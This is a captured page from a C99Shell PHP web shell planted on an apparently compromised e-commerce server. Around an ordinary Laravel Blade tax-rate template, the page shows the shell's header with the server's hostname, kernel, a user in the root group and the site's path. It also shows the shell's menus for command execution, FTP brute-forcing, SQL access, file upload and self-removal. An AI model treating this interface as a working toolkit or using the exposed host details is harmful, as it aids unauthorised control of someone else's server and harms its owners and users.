!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/Modules/Tax/Resources/views/layout/   drwxr-xr-x
Free 26.1 GB of 117.98 GB (22.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     contents.blade.php (7.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
{{-- Setting --}}
<div class="tab-pane fade parent tax-setting-parent" id="v-pills-general" role="tabpanel" aria-labelledby="v-pills-general-tab">
    {{-- Tax setting --}}
    @include('tax::layout.tax-setting')
</div>
{{-- Standard rates --}}
<div class="tab-pane fade parent tax-rate-data mt-25" id="v-pills-standard" role="tabpanel" aria-labelledby="v-pills-standard-tab">
    @include('tax::layout.standard-rate')
</div>

@foreach ($tax_classes as $tax)
    <div class="tab-pane fade parent mt-25 tax-rate-data" id="v-pills-{{ $tax->slug }}" role="tabpanel" aria-labelledby="v-pills-{{ $tax->slug }}-tab">
        <div class="noti-alert pad no-print warningMessage mt-2 px-2">
            <div class="alert warning-message abc">
                <strong id="warning-msg" class="msg"></strong>
            </div>
        </div>
        <div class="row {{ languageDirection() == 'ltr' ? 'ps-4' : 'pe-4' }}">
            <div class="col-sm-12 p-0">
                <div class="table-responsive">
                    <table class="table table-bordered table-hover">
                        <thead>
                            <tr>
                                <th scope="col">{{ __('Name') }}</th>
                                <th scope="col">{{ __('Country') }}</th>
                                <th scope="col">{{ __('State') }}</th>
                                <th scope="col">{{ __('City') }}</th>
                                <th scope="col">{{ __('Post code') }}</th>
                                <th width="100" scope="col">{{ __('Rate') }} %</th>
                                <th width="100" scope="col">{{ __('Priority') }}</th>
                                <th width="5" scope="col">{{ __('Compound') }}</th>
                                <th width="5" scope="col">{{ __('Shipping') }}</th>
                                <th width="5" scope="col">{{ __('Action') }}</th>
                            </tr>
                        </thead>
                        <tbody>
                            @forelse ($tax->taxRates as $rate)
                                <tr>
                                    <td>
                                        <input type="hidden" name="id">
                                        <input type="hidden" name="tax_class_id" value="{{ $tax->id }}">
                                        <input type="text" class="form-control" name="name" value="{{ $rate->name }}">
                                    </td>
                                    <td>
                                        <input type="text" class="form-control geolocale-country" list="country-list" maxlength="30" name="country" value="{{ empty($rate->country) ? '*' : $rate->country }}">
                                    </td>
                                    <td>
                                        <input type="text" class="form-control geolocale-state" list="state-list" maxlength="30" name="state" value="{{ empty($rate->state) ? '*' : $rate->state }}">
                                    </td>
                                    <td>
                                        <input type="text" class="form-control" maxlength="30" name="city" value="{{ empty($rate->city) ? '*' : $rate->city }}">
                                    </td>
                                    <td>
                                        <input type="text" class="form-control" maxlength="10" name="postcode" value="{{ empty($rate->postcode) ? '*' : $rate->postcode }}">
                                    </td>
                                    <td>
                                        <input type="text" class="form-control positive-float-number" maxlength="16" name="tax_rate" value="{{ formatCurrencyAmount($rate->tax_rate) }}">
                                    </td>
                                    <td>
                                        <input type="text" class="form-control positive-int-number" maxlength="11" name="priority" value="{{ $rate->priority }}">
                                    </td>
                                    @php
                                        $randCompound = mt_rand();
                                        $randShipping = mt_rand();
                                    @endphp
                                    <th>
                                        <div>
                                            <div class="switch switch-bg m-r-10">
                                                <input type="checkbox" name="compound" class="checkActivity" id="switch-{{ $randCompound }}" value="{{ $rate->compound }}" {{ $rate->compound == 1 ? 'checked' : '' }}>
                                                <label for="switch-{{ $randCompound }}" class="cr"></label>
                                            </div>
                                        </div>
                                    </th>
                                    <th>
                                        <div>
                                            <div class="switch switch-bg m-r-10">
                                                <input type="checkbox" name="shipping" class="checkActivity" id="switch-{{ $randShipping }}" value="{{ $rate->shipping }}" {{ $rate->shipping == 1 ? 'checked' : '' }}>
                                                <label for="switch-{{ $randShipping }}" class="cr"></label>
                                            </div>
                                        </div>
                                    </th>
                                    <td>
                                        <span class="text-dark cursor_pointer delete-button action-btn d-flex justify-content-center" title="{{ __('Delete Tax Rate') }}">
                                            <i class="fa fa-trash"></i>
                                        </span>
                                    </td>
                                </tr>
                            @empty
                                <tr>
                                    <td class="text-center" colspan="10">{{ __('No tax rate found.') }}</td>
                                </tr>
                            @endforelse

                            <tr>
                                <td colspan="10" class="pt-3">
                                    <button type="button" data-id="{{ $tax->id }}" class="btn custom-btn-submit btn-sm add-btn">{{ __('Add New') }}</button>
                                    @if ($tax->taxRates->count())
                                        <button type="submit" data-id="{{ $tax->id }}" class="btn custom-btn-submit btn-sm update-btn">{{ __('Save') }}</button>
                                    @endif
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </div>
            </div>
        </div>
    </div>
@endforeach


{{-- Help --}}
<div class="tab-pane fade parent tax-setting-parent mt-25" id="v-pills-help" role="tabpanel" aria-labelledby="v-pills-help-tab">
    @include('tax::layout.help')
</div>

{{-- Dynamic datalist --}}
<datalist id="country-list"></datalist>
<datalist id="state-list"></datalist>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--